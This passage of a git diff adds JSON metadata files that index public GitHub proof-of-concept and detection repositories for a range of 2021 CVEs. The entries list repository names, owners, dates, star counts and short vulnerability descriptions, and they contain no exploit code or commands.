+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 0
+ },
+ {
+ "id": 535520694,
+ "name": "cve-2021-42321",
+ "full_name": "xnyuq\/cve-2021-42321",
+ "owner": {
+ "login": "xnyuq",
+ "id": 44139189,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/44139189?v=4",
+ "html_url": "https:\/\/github.com\/xnyuq"
+ },
+ "html_url": "https:\/\/github.com\/xnyuq\/cve-2021-42321",
+ "description": null,
+ "fork": false,
+ "created_at": "2022-09-12T05:13:40Z",
+ "updated_at": "2022-09-12T05:13:40Z",
+ "pushed_at": "2022-09-12T05:15:26Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 547867056,
+ "name": "exch_CVE-2021-42321",
+ "full_name": "7BitsTeam\/exch_CVE-2021-42321",
+ "owner": {
+ "login": "7BitsTeam",
+ "id": 107024599,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/107024599?v=4",
+ "html_url": "https:\/\/github.com\/7BitsTeam"
+ },
+ "html_url": "https:\/\/github.com\/7BitsTeam\/exch_CVE-2021-42321",
+ "description": null,
+ "fork": false,
+ "created_at": "2022-10-08T13:00:23Z",
+ "updated_at": "2024-06-21T06:14:32Z",
+ "pushed_at": "2022-10-08T13:51:48Z",
+ "stargazers_count": 9,
+ "watchers_count": 9,
+ "has_discussions": false,
+ "forks_count": 3,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 3,
+ "watchers": 9,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2021/CVE-2021-42325.json b/2021/CVE-2021-42325.json
new file mode 100644
index 0000000000..aadc74f80b
--- /dev/null
+++ b/2021/CVE-2021-42325.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 434114286,
+ "name": "CVE-2021-42325-",
+ "full_name": "AK-blank\/CVE-2021-42325-",
+ "owner": {
+ "login": "AK-blank",
+ "id": 56591429,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/56591429?v=4",
+ "html_url": "https:\/\/github.com\/AK-blank"
+ },
+ "html_url": "https:\/\/github.com\/AK-blank\/CVE-2021-42325-",
+ "description": "CVE-2021-42325 POC",
+ "fork": false,
+ "created_at": "2021-12-02T06:56:02Z",
+ "updated_at": "2021-12-03T00:25:24Z",
+ "pushed_at": "2021-12-02T06:58:17Z",
+ "stargazers_count": 1,
+ "watchers_count": 1,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 1,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2021/CVE-2021-42327.json b/2021/CVE-2021-42327.json
new file mode 100644
index 0000000000..85b5bf84af
--- /dev/null
+++ b/2021/CVE-2021-42327.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 422356561,
+ "name": "CVE-2021-42327",
+ "full_name": "docfate111\/CVE-2021-42327",
+ "owner": {
+ "login": "docfate111",
+ "id": 24590069,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/24590069?v=4",
+ "html_url": "https:\/\/github.com\/docfate111"
+ },
+ "html_url": "https:\/\/github.com\/docfate111\/CVE-2021-42327",
+ "description": " kernel exploit POC for vulnerability i found in amd gpu driver",
+ "fork": false,
+ "created_at": "2021-10-28T21:10:29Z",
+ "updated_at": "2023-08-20T21:42:03Z",
+ "pushed_at": "2023-01-06T13:04:17Z",
+ "stargazers_count": 10,
+ "watchers_count": 10,
+ "has_discussions": false,
+ "forks_count": 4,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 4,
+ "watchers": 10,
+ "score": 0,
+ "subscribers_count": 4
+ }
+]
\ No newline at end of file
diff --git a/2021/CVE-2021-42342.json b/2021/CVE-2021-42342.json
new file mode 100644
index 0000000000..ac44ee852f
--- /dev/null
+++ b/2021/CVE-2021-42342.json
@@ -0,0 +1,92 @@
+[
+ {
+ "id": 416209688,
+ "name": "goahead-webserver-pre-5.1.5-RCE-PoC-CVE-2021-42342-",
+ "full_name": "kimusan\/goahead-webserver-pre-5.1.5-RCE-PoC-CVE-2021-42342-",
+ "owner": {
+ "login": "kimusan",
+ "id": 1150049,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/1150049?v=4",
+ "html_url": "https:\/\/github.com\/kimusan"
+ },
+ "html_url": "https:\/\/github.com\/kimusan\/goahead-webserver-pre-5.1.5-RCE-PoC-CVE-2021-42342-",
+ "description": "A small PoC for the recent RCE found in the Goahead Webserver prior to version 5.1.5. ",
+ "fork": false,
+ "created_at": "2021-10-12T06:21:02Z",
+ "updated_at": "2022-11-09T18:14:02Z",
+ "pushed_at": "2021-10-18T20:56:31Z",
+ "stargazers_count": 21,
+ "watchers_count": 21,
+ "has_discussions": false,
+ "forks_count": 4,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 4,
+ "watchers": 21,
+ "score": 0,
+ "subscribers_count": 2
+ },
+ {
+ "id": 444456600,
+ "name": "CVE-2021-42342",
+ "full_name": "Mr-xn\/CVE-2021-42342",
+ "owner": {
+ "login": "Mr-xn",
+ "id": 18260135,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/18260135?v=4",
+ "html_url": "https:\/\/github.com\/Mr-xn"
+ },
+ "html_url": "https:\/\/github.com\/Mr-xn\/CVE-2021-42342",
+ "description": "CVE-2021-42342 RCE",
+ "fork": false,
+ "created_at": "2022-01-04T14:48:59Z",
+ "updated_at": "2024-06-21T10:49:24Z",
+ "pushed_at": "2022-01-04T14:54:39Z",
+ "stargazers_count": 43,
+ "watchers_count": 43,
+ "has_discussions": false,
+ "forks_count": 9,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 9,
+ "watchers": 43,
+ "score": 0,
+ "subscribers_count": 4
+ },
+ {
+ "id": 711394073,
+ "name": "-zeroboo-Gohead-CVE-2021-42342-1",
+ "full_name": "ijh4723\/-zeroboo-Gohead-CVE-2021-42342-1",
+ "owner": {
+ "login": "ijh4723",
+ "id": 116932933,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/116932933?v=4",
+ "html_url": "https:\/\/github.com\/ijh4723"
+ },
+ "html_url": "https:\/\/github.com\/ijh4723\/-zeroboo-Gohead-CVE-2021-42342-1",
+ "description": null,
+ "fork": false,
+ "created_at": "2023-10-29T05:50:47Z",
+ "updated_at": "2023-10-29T05:50:47Z",
+ "pushed_at": "2023-10-29T05:50:47Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2021/CVE-2021-42362.json b/2021/CVE-2021-42362.json
new file mode 100644
index 0000000000..658bb48847
--- /dev/null
+++ b/2021/CVE-2021-42362.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 386012997,
+ "name": "CVE-2021-42362-PoC",
+ "full_name": "simonecris\/CVE-2021-42362-PoC",
+ "owner": {
+ "login": "simonecris",
+ "id": 63792651,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/63792651?v=4",
+ "html_url": "https:\/\/github.com\/simonecris"
+ },
+ "html_url": "https:\/\/github.com\/simonecris\/CVE-2021-42362-PoC",
+ "description": "Wordpress Most Popular Post plugin vuln",
+ "fork": false,
+ "created_at": "2021-07-14T16:55:50Z",
+ "updated_at": "2022-03-04T14:51:09Z",
+ "pushed_at": "2021-07-14T23:41:15Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": true,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2021/CVE-2021-42392.json b/2021/CVE-2021-42392.json
new file mode 100644
index 0000000000..7d547b8fd8
--- /dev/null
+++ b/2021/CVE-2021-42392.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 446140996,
+ "name": "CVE-2021-42392-Detect",
+ "full_name": "cybersecurityworks553\/CVE-2021-42392-Detect",
+ "owner": {
+ "login": "cybersecurityworks553",
+ "id": 63910792,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/63910792?v=4",
+ "html_url": "https:\/\/github.com\/cybersecurityworks553"
+ },
+ "html_url": "https:\/\/github.com\/cybersecurityworks553\/CVE-2021-42392-Detect",
+ "description": null,
+ "fork": false,
+ "created_at": "2022-01-09T16:23:16Z",
+ "updated_at": "2023-04-01T01:34:12Z",
+ "pushed_at": "2022-01-17T06:56:02Z",
+ "stargazers_count": 7,
+ "watchers_count": 7,
+ "has_discussions": false,
+ "forks_count": 2,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 2,
+ "watchers": 7,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2021/CVE-2021-42558.json b/2021/CVE-2021-42558.json
new file mode 100644
index 0000000000..dd54a94d26
--- /dev/null
+++ b/2021/CVE-2021-42558.json
@@ -0,0 +1,38 @@
+[
+ {
+ "id": 812766804,
+ "name": "CVE-2021-42558",
+ "full_name": "mbadanoiu\/CVE-2021-42558",
+ "owner": {
+ "login": "mbadanoiu",
+ "id": 18383407,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/18383407?v=4",
+ "html_url": "https:\/\/github.com\/mbadanoiu"
+ },
+ "html_url": "https:\/\/github.com\/mbadanoiu\/CVE-2021-42558",
+ "description": "CVE-2021-42558: Multiple Cross-Site Scripting in MITRE Caldera",
+ "fork": false,
+ "created_at": "2024-06-09T20:20:46Z",
+ "updated_at": "2024-06-09T20:34:14Z",
+ "pushed_at": "2024-06-09T20:32:08Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [
+ "0-day",
+ "cross-site-scripting",
+ "cve",
+ "cve-2021-42558",
+ "cves"
+ ],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2021/CVE-2021-42559.json b/2021/CVE-2021-42559.json
new file mode 100644
index 0000000000..d5c3879a8a
--- /dev/null
+++ b/2021/CVE-2021-42559.json
@@ -0,0 +1,39 @@
+[
+ {
+ "id": 812777593,
+ "name": "CVE-2021-42559",
+ "full_name": "mbadanoiu\/CVE-2021-42559",
+ "owner": {
+ "login": "mbadanoiu",
+ "id": 18383407,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/18383407?v=4",
+ "html_url": "https:\/\/github.com\/mbadanoiu"
+ },
+ "html_url": "https:\/\/github.com\/mbadanoiu\/CVE-2021-42559",
+ "description": "CVE-2021-42559: Command Injection via Configurations in MITRE Caldera",
+ "fork": false,
+ "created_at": "2024-06-09T21:07:16Z",
+ "updated_at": "2024-06-09T21:14:20Z",
+ "pushed_at": "2024-06-09T21:13:51Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [
+ "0-day",
+ "authenticated",
+ "cve",
+ "cve-2021-42559",
+ "cves",
+ "remote-code-execution"
+ ],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2021/CVE-2021-42560.json b/2021/CVE-2021-42560.json
new file mode 100644
index 0000000000..a1b2b4c69e
--- /dev/null
+++ b/2021/CVE-2021-42560.json
@@ -0,0 +1,39 @@
+[
+ {
+ "id": 812783452,
+ "name": "CVE-2021-42560",
+ "full_name": "mbadanoiu\/CVE-2021-42560",
+ "owner": {
+ "login": "mbadanoiu",
+ "id": 18383407,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/18383407?v=4",
+ "html_url": "https:\/\/github.com\/mbadanoiu"
+ },
+ "html_url": "https:\/\/github.com\/mbadanoiu\/CVE-2021-42560",
+ "description": "CVE-2021-42560: Unsafe XML Parsing in MITRE Caldera",
+ "fork": false,
+ "created_at": "2024-06-09T21:33:07Z",
+ "updated_at": "2024-06-09T21:42:54Z",
+ "pushed_at": "2024-06-09T21:40:16Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [
+ "0-day",
+ "authenticated",
+ "cve",
+ "cve-2021-42560",
+ "cves",
+ "xxe"
+ ],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2021/CVE-2021-42561.json b/2021/CVE-2021-42561.json
new file mode 100644
index 0000000000..aa658608fa
--- /dev/null
+++ b/2021/CVE-2021-42561.json
@@ -0,0 +1,39 @@
+[
+ {
+ "id": 812797307,
+ "name": "CVE-2021-42561",
+ "full_name": "mbadanoiu\/CVE-2021-42561",
+ "owner": {
+ "login": "mbadanoiu",
+ "id": 18383407,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/18383407?v=4",
+ "html_url": "https:\/\/github.com\/mbadanoiu"
+ },
+ "html_url": "https:\/\/github.com\/mbadanoiu\/CVE-2021-42561",
+ "description": "CVE-2021-42561: Command Injection via the Human Plugin in MITRE Caldera",
+ "fork": false,
+ "created_at": "2024-06-09T22:39:46Z",
+ "updated_at": "2024-06-09T22:57:08Z",
+ "pushed_at": "2024-06-09T22:42:48Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [
+ "0-day",
+ "authenticated",
+ "cve",
+ "cve-2021-42561",
+ "cves",
+ "remote-code-execution"
+ ],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2021/CVE-2021-42562.json b/2021/CVE-2021-42562.json
new file mode 100644
index 0000000000..28548aa20d
--- /dev/null
+++ b/2021/CVE-2021-42562.json
@@ -0,0 +1,39 @@
+[
+ {
+ "id": 812801922,
+ "name": "CVE-2021-42562",
+ "full_name": "mbadanoiu\/CVE-2021-42562",
+ "owner": {
+ "login": "mbadanoiu",
+ "id": 18383407,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/18383407?v=4",
+ "html_url": "https:\/\/github.com\/mbadanoiu"
+ },
+ "html_url": "https:\/\/github.com\/mbadanoiu\/CVE-2021-42562",
+ "description": "CVE-2021-42562: Improper Access Control in MITRE Caldera",
+ "fork": false,
+ "created_at": "2024-06-09T23:04:45Z",
+ "updated_at": "2024-06-09T23:25:44Z",
+ "pushed_at": "2024-06-09T23:23:41Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [
+ "0-day",
+ "authenticated",
+ "cve",
+ "cve-2021-42562",
+ "cves",
+ "insecure-direct-object-reference"
+ ],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2021/CVE-2021-42574.json b/2021/CVE-2021-42574.json
new file mode 100644
index 0000000000..80bc20353e
--- /dev/null
+++ b/2021/CVE-2021-42574.json
@@ -0,0 +1,219 @@
+[
+ {
+ "id": 423467826,
+ "name": "CVE-2021-42574",
+ "full_name": "shiomiyan\/CVE-2021-42574",
+ "owner": {
+ "login": "shiomiyan",
+ "id": 35842766,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/35842766?v=4",
+ "html_url": "https:\/\/github.com\/shiomiyan"
+ },
+ "html_url": "https:\/\/github.com\/shiomiyan\/CVE-2021-42574",
+ "description": null,
+ "fork": false,
+ "created_at": "2021-11-01T13:05:48Z",
+ "updated_at": "2021-11-02T02:47:29Z",
+ "pushed_at": "2021-11-01T13:15:09Z",
+ "stargazers_count": 1,
+ "watchers_count": 1,
+ "has_discussions": false,
+ "forks_count": 1,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 1,
+ "watchers": 1,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 423551580,
+ "name": "CVE-2021-42574_and_CVE-2021-42694",
+ "full_name": "hffaust\/CVE-2021-42574_and_CVE-2021-42694",
+ "owner": {
+ "login": "hffaust",
+ "id": 15644021,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/15644021?v=4",
+ "html_url": "https:\/\/github.com\/hffaust"
+ },
+ "html_url": "https:\/\/github.com\/hffaust\/CVE-2021-42574_and_CVE-2021-42694",
+ "description": null,
+ "fork": false,
+ "created_at": "2021-11-01T17:13:50Z",
+ "updated_at": "2023-08-20T01:44:35Z",
+ "pushed_at": "2021-11-01T17:13:51Z",
+ "stargazers_count": 1,
+ "watchers_count": 1,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 1,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 423899769,
+ "name": "CVE-2021-42574",
+ "full_name": "simplylu\/CVE-2021-42574",
+ "owner": {
+ "login": "simplylu",
+ "id": 55274241,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/55274241?v=4",
+ "html_url": "https:\/\/github.com\/simplylu"
+ },
+ "html_url": "https:\/\/github.com\/simplylu\/CVE-2021-42574",
+ "description": "Generate malicious files using recently published bidi-attack (CVE-2021-42574)",
+ "fork": false,
+ "created_at": "2021-11-02T15:32:38Z",
+ "updated_at": "2024-04-03T07:49:49Z",
+ "pushed_at": "2023-05-23T19:49:48Z",
+ "stargazers_count": 9,
+ "watchers_count": 9,
+ "has_discussions": false,
+ "forks_count": 6,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 6,
+ "watchers": 9,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 425359583,
+ "name": "bidi_char_detector",
+ "full_name": "maweil\/bidi_char_detector",
+ "owner": {
+ "login": "maweil",
+ "id": 16721506,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/16721506?v=4",
+ "html_url": "https:\/\/github.com\/maweil"
+ },
+ "html_url": "https:\/\/github.com\/maweil\/bidi_char_detector",
+ "description": "Checks your files for existence of Unicode BIDI characters which can be misused for supply chain attacks. See CVE-2021-42574 ",
+ "fork": false,
+ "created_at": "2021-11-06T22:12:35Z",
+ "updated_at": "2023-09-28T11:33:02Z",
+ "pushed_at": "2023-03-28T05:59:47Z",
+ "stargazers_count": 6,
+ "watchers_count": 6,
+ "has_discussions": false,
+ "forks_count": 3,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [
+ "cve-2021-42574",
+ "docker",
+ "rust",
+ "security",
+ "supply-chain-attacks",
+ "unicode-characters"
+ ],
+ "visibility": "public",
+ "forks": 3,
+ "watchers": 6,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 431761296,
+ "name": "unicode-control-characters-action",
+ "full_name": "pierDipi\/unicode-control-characters-action",
+ "owner": {
+ "login": "pierDipi",
+ "id": 33736985,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/33736985?v=4",
+ "html_url": "https:\/\/github.com\/pierDipi"
+ },
+ "html_url": "https:\/\/github.com\/pierDipi\/unicode-control-characters-action",
+ "description": "A GitHub Action to find Unicode control characters using the Red Hat diagnostic tool https:\/\/access.redhat.com\/security\/vulnerabilities\/RHSB-2021-007 to detect RHSB-2021-007 Trojan source attacks (CVE-2021-42574,CVE-2021-42694)",
+ "fork": false,
+ "created_at": "2021-11-25T08:02:31Z",
+ "updated_at": "2021-11-25T11:56:45Z",
+ "pushed_at": "2023-04-05T10:43:44Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 2,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 2,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 3
+ },
+ {
+ "id": 437216021,
+ "name": "CVE-2021-42574",
+ "full_name": "waseeld\/CVE-2021-42574",
+ "owner": {
+ "login": "waseeld",
+ "id": 33339924,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/33339924?v=4",
+ "html_url": "https:\/\/github.com\/waseeld"
+ },
+ "html_url": "https:\/\/github.com\/waseeld\/CVE-2021-42574",
+ "description": null,
+ "fork": false,
+ "created_at": "2021-12-11T07:23:17Z",
+ "updated_at": "2021-12-11T07:31:14Z",
+ "pushed_at": "2021-12-11T07:28:41Z",
+ "stargazers_count": 1,
+ "watchers_count": 1,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 1,
+ "score": 0,
+ "subscribers_count": 2
+ },
+ {
+ "id": 595745234,
+ "name": "solidity_CVE-2021-42574-POC",
+ "full_name": "tin-z\/solidity_CVE-2021-42574-POC",
+ "owner": {
+ "login": "tin-z",
+ "id": 32848129,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/32848129?v=4",
+ "html_url": "https:\/\/github.com\/tin-z"
+ },
+ "html_url": "https:\/\/github.com\/tin-z\/solidity_CVE-2021-42574-POC",
+ "description": "POC of CVE-2021-42574 for solidity and solc compiler",
+ "fork": false,
+ "created_at": "2023-01-31T18:15:00Z",
+ "updated_at": "2023-02-09T08:57:26Z",
+ "pushed_at": "2023-02-01T09:34:26Z",
+ "stargazers_count": 2,
+ "watchers_count": 2,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 2,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2021/CVE-2021-42662.json b/2021/CVE-2021-42662.json
new file mode 100644
index 0000000000..e89b524ff5
--- /dev/null
+++ b/2021/CVE-2021-42662.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 424326946,
+ "name": "CVE-2021-42662",
+ "full_name": "0xDeku\/CVE-2021-42662",
+ "owner": {
+ "login": "0xDeku",
+ "id": 93016131,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/93016131?v=4",
+ "html_url": "https:\/\/github.com\/0xDeku"
+ },
+ "html_url": "https:\/\/github.com\/0xDeku\/CVE-2021-42662",
+ "description": "CVE-2021-42662 - Stored Cross-Site Scripting vulnerability in the Online event booking and reservation system. ",
+ "fork": false,
+ "created_at": "2021-11-03T17:51:55Z",
+ "updated_at": "2022-04-24T13:55:02Z",
+ "pushed_at": "2022-03-24T18:08:34Z",
+ "stargazers_count": 3,
+ "watchers_count": 3,
+ "has_discussions": false,
+ "forks_count": 2,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 2,
+ "watchers": 3,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2021/CVE-2021-42663.json b/2021/CVE-2021-42663.json
new file mode 100644
index 0000000000..4bdd8887db
--- /dev/null
+++ b/2021/CVE-2021-42663.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 424343690,
+ "name": "CVE-2021-42663",
+ "full_name": "0xDeku\/CVE-2021-42663",
+ "owner": {
+ "login": "0xDeku",
+ "id": 93016131,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/93016131?v=4",
+ "html_url": "https:\/\/github.com\/0xDeku"
+ },
+ "html_url": "https:\/\/github.com\/0xDeku\/CVE-2021-42663",
+ "description": "CVE-2021-42663 - HTML Injection vulnerability in the Online event booking and reservation system. ",
+ "fork": false,
+ "created_at": "2021-11-03T18:49:28Z",
+ "updated_at": "2022-04-24T13:55:00Z",
+ "pushed_at": "2022-03-24T18:09:07Z",
+ "stargazers_count": 1,
+ "watchers_count": 1,
+ "has_discussions": false,
+ "forks_count": 1,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 1,
+ "watchers": 1,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2021/CVE-2021-42664.json b/2021/CVE-2021-42664.json
new file mode 100644
index 0000000000..28920549ed
--- /dev/null
+++ b/2021/CVE-2021-42664.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 424354876,
+ "name": "CVE-2021-42664",
+ "full_name": "0xDeku\/CVE-2021-42664",
+ "owner": {
+ "login": "0xDeku",
+ "id": 93016131,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/93016131?v=4",
+ "html_url": "https:\/\/github.com\/0xDeku"
+ },
+ "html_url": "https:\/\/github.com\/0xDeku\/CVE-2021-42664",
+ "description": " CVE-2021-42664 - Stored Cross-Site Scripting vulnerability in the Engineers online portal system.",
+ "fork": false,
+ "created_at": "2021-11-03T19:29:57Z",
+ "updated_at": "2022-04-24T13:54:56Z",
+ "pushed_at": "2022-03-24T18:09:35Z",
+ "stargazers_count": 1,
+ "watchers_count": 1,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 1,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2021/CVE-2021-42665.json b/2021/CVE-2021-42665.json
new file mode 100644
index 0000000000..d85a9434ed
--- /dev/null
+++ b/2021/CVE-2021-42665.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 424362612,
+ "name": "CVE-2021-42665",
+ "full_name": "0xDeku\/CVE-2021-42665",
+ "owner": {
+ "login": "0xDeku",
+ "id": 93016131,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/93016131?v=4",
+ "html_url": "https:\/\/github.com\/0xDeku"
+ },
+ "html_url": "https:\/\/github.com\/0xDeku\/CVE-2021-42665",
+ "description": "CVE-2021-42665 - SQL Injection authentication bypass vulnerability in the Engineers online portal system. ",
+ "fork": false,
+ "created_at": "2021-11-03T19:58:58Z",
+ "updated_at": "2023-07-21T16:30:04Z",
+ "pushed_at": "2022-03-24T18:09:50Z",
+ "stargazers_count": 2,
+ "watchers_count": 2,
+ "has_discussions": false,
+ "forks_count": 1,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 1,
+ "watchers": 2,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2021/CVE-2021-42666.json b/2021/CVE-2021-42666.json
new file mode 100644
index 0000000000..57eef0fe5a
--- /dev/null
+++ b/2021/CVE-2021-42666.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 424367205,
+ "name": "CVE-2021-42666",
+ "full_name": "0xDeku\/CVE-2021-42666",
+ "owner": {
+ "login": "0xDeku",
+ "id": 93016131,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/93016131?v=4",
+ "html_url": "https:\/\/github.com\/0xDeku"
+ },
+ "html_url": "https:\/\/github.com\/0xDeku\/CVE-2021-42666",
+ "description": "CVE-2021-42666 - SQL Injection vulnerability in the Engineers online portal system. ",
+ "fork": false,
+ "created_at": "2021-11-03T20:14:58Z",
+ "updated_at": "2022-04-24T13:54:53Z",
+ "pushed_at": "2022-03-24T18:10:08Z",
+ "stargazers_count": 1,
+ "watchers_count": 1,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 1,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2021/CVE-2021-42667.json b/2021/CVE-2021-42667.json
new file mode 100644
index 0000000000..9bcf600272
